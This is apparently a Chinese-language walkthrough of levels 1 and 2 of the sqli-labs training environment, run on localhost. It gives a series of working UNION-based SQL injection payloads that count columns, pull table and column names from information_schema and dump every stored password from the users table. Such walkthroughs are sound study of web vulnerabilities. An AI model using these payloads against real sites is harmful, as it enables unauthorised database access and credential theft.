level1
输入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1)
![](https://img.haomeiwen.com/i18749995/de865fe9a6000fb0.png)
后面加一个'
并将后面注释掉试试效果:
构造?id=1' --+
(这里#
被注释了)
![](https://img.haomeiwen.com/i18749995/a56903629a35e612.png)
然后判断字段数
?id=1' order by 3 --+
order by 3的时候回显正常,order by 4的时候报错,那证明字段就是3个。
然后判断注入点
?id=0' union select 1,2,3 --+
![](https://img.haomeiwen.com/i18749995/185fe7a7daf36d98.png)
2和3是注入点,随便找个位置开始注入
?id=0' union select 1,database(),3 --+
![](https://img.haomeiwen.com/i18749995/b5dd53a90be9b29e.png)
数据库名爆出来了,security
然后爆表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
因为这里只显示一行,虽然后面的LIMIT 0,1被注释掉了,但是后台可能还有其他函数限制输出,所以用group_concat()来将所有输出整在一行内
![](https://img.haomeiwen.com/i18749995/3ba67101bbc80e25.png)
猜测flag应该在users表中
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
![](https://img.haomeiwen.com/i18749995/e6548761e9c2da18.png)
maybe在password字段中
?id=-1' union select 1,group_concat(password),3 from users --+
![](https://img.haomeiwen.com/i18749995/eedf3dd6bfa27ba0.png)
okok搞定
level2
首先构造?id=1'--+
发现报错,那这个应该不是字符类型
然后判断字段数?id=1 order by 3 --+
![](https://img.haomeiwen.com/i18749995/d90793644a43ee02.png)
然后构造?id=1 union select 1,2,3 --+
发现注入点,接下来的操作跟上一题一样,就不做介绍了,直接贴payload
?id=1 union select 1,database(),3 --+
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
?id=-1 union select 1,group_concat(password),3 from users --+
网友评论